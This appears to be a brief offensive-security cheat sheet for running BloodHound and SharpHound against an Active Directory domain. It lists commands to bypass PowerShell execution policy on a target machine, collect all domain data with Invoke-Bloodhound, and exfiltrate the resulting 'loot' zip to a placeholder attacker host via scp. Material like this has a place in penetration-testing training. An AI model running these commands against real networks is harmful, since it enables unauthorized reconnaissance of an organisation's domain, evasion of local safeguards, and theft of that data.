https://github.com/BloodHoundAD/BloodHound
Start (Attacker Machine)
sudo neo4j consoleStart Neo4j (then connect on http://localhost:7474/).
bloodhoundStart Bloodhound.
Loot (Target Machine)
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
powershell.exe -ExecutionPolicy bypassBypass PowerShell script execution restrictions.
. .\SharpHound.ps1Initialize SharpHound.
Invoke-Bloodhound -CollectionMethod All -Domain [TARGET_DOMAIN] -ZipFileName BloudhoundLoot.zipRun SharpHound.
scp BloudhoundLoot.zip myUser@[ATTACKER_MACHINE]:/home/myUser/Bring back the loot to the attacker's machine, and open it in Bloodhound Web UI.